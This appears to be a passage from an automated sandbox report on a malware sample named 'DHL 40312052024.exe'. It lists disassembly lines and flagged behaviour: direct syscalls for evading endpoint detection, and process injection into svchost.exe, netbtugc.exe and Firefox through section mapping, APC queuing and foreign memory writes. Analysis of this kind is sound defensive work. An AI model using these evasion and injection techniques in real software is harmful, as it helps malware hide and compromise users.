            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]2_2_0335EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]2_2_033BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]2_2_033DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]2_2_03350BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]2_2_03330BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]2_2_03354A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]2_2_0336CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]2_2_0336CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]2_2_0335EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]2_2_033BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]2_2_033ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]2_2_0336CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]2_2_033DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]2_2_03336A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]2_2_03340A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]2_2_03338AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]2_2_03386AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]2_2_03368A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]2_2_0333EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]2_2_03404A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]2_2_0336AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]2_2_03330AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]2_2_03364AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]2_2_03386ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]2_2_033B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]2_2_033C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]2_2_033BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]2_2_03328918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]2_2_033AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]2_2_033D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]2_2_033BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]2_2_03356962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]2_2_033B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]2_2_033B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]2_2_033429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]2_2_033309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]2_2_033629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]2_2_033BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]2_2_0333A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]2_2_033649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]2_2_033FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]2_2_033C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]2_2_03352835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]2_2_0336A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]2_2_033D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]2_2_033BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]2_2_033BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]2_2_033C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]2_2_033C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]2_2_03360854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]2_2_03334859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]2_2_03334859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]2_2_03342840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]2_2_033BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]2_2_03330887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]2_2_0336C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]2_2_0336C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]2_2_033FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]2_2_0335E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]2_2_0335EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]2_2_03332F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]2_2_03404F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336CF1F mov eax, dword ptr fs:[00000030h]2_2_0336CF1F
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008080A9
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007DA155
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007DA124 SetUnhandledExceptionFilter,0_2_007DA124

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\DHL 40312052024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 4676Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\DHL 40312052024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 634008Jump to behavior
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_008087B1 LogonUserW,0_2_008087B1
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007B3B3A
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_007B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007B48D7
            Source: C:\Users\user\Desktop\DHL 40312052024.exeCode function: 0_2_00814C27 mouse_event,0_2_00814C27
            Source: C:\Users\user\Desktop\DHL 40312052024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 40312052024.exe"Jump to behavior
            Source: C:\Program Files (x86)\zXXMdJrjVnvIvHZcsndNGlxPnOtIsqJdmcnavVHSAEZhdrHrlu\oYzsgiLOOTqCTABCCGZlOCaAgG.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
